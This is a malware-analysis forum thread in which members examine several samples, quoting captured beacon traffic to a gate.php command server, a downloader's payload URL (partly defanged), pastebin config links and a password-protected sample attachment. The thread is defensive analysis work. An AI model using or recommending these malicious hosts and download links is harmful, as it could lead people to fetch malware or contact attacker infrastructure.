A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #6214  by Xylitol
 Thu May 05, 2011 11:07 pm
markusg wrote:Setup.exe
http://www.virustotal.com/file-scan/rep ... 1304615533
could be some sort of banker?
call home every min
Code: Select all
GET /gate.php?id=05878112 HTTP/1.1
User-Agent: al
Host: wart3.jino.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 23:06:08 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
Server: Jino.ru/mod_pizza
Content-Length: 0
----------------------------------------------------
GET /gate.php?id=05878112 HTTP/1.1
User-Agent: al
Host: wart3.jino.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 23:07:08 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
Server: Jino.ru/mod_pizza
Content-Length: 0
----------------------------------------------------
GET /gate.php?id=05878112 HTTP/1.1
User-Agent: al
Host: wart3.jino.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 23:08:09 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
Server: Jino.ru/mod_pizza
Content-Length: 0
http://anubis.iseclab.org/?action=resul ... ormat=html
http://www.sunbeltsecurity.com/cwsandbo ... C3D3ECB09A
http://camas.comodo.com/cgi-bin/submit? ... 352eb48e4a
http://www.threatexpert.com/report.aspx ... e6b1e8b9fc

reuploaded, high workload.
Image
 #13955  by Buster_BSA
 Thu Jun 14, 2012 12:46 am
Looking at Buster Sandbox Analyzer´s report I´ld say a crappy VB downloader.
 #13956  by EP_X0FF
 Thu Jun 14, 2012 2:24 am
Downloads and executes arbitary files from hxxp://abuser.user32.com

hxxp://abuser.user32.com/flash_player.zip

To view fake facebook page add anything to URL e.g. hxxp://abuser.user32.com//1
GET /update.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1 SV1)
Accept-Language: en
Accept: */*
Host: abuser.user32.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Thu, 14 Jun 2012 02:12:17 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Attachments
pass: infected
(310.84 KiB) Downloaded 48 times
 #14268  by EP_X0FF
 Mon Jun 25, 2012 2:21 pm
rkhunter wrote:
markusg wrote:https://www.virustotal.com/file/bb1431a ... /analysis/
Legitimate tool?
No, look deeper :) I doubt Realtek is like this
C : \ U s e r s \ a l e k o v o \ D e s k t o p \ [ F a n P r o j e c t ] \ [ V B 6 ] F a n P r o j e c t \ F a n P r o j e c t . v b p
configs here

http://pastebin.com/PF4F1NNN
http://codepaste.net/zp1q6b

yes, these links hardcoded inside.
 #14270  by rkhunter
 Mon Jun 25, 2012 2:39 pm
EP_X0FF wrote:No, look deeper :) I doubt Realtek is like this
yep, they need to be more secretive :)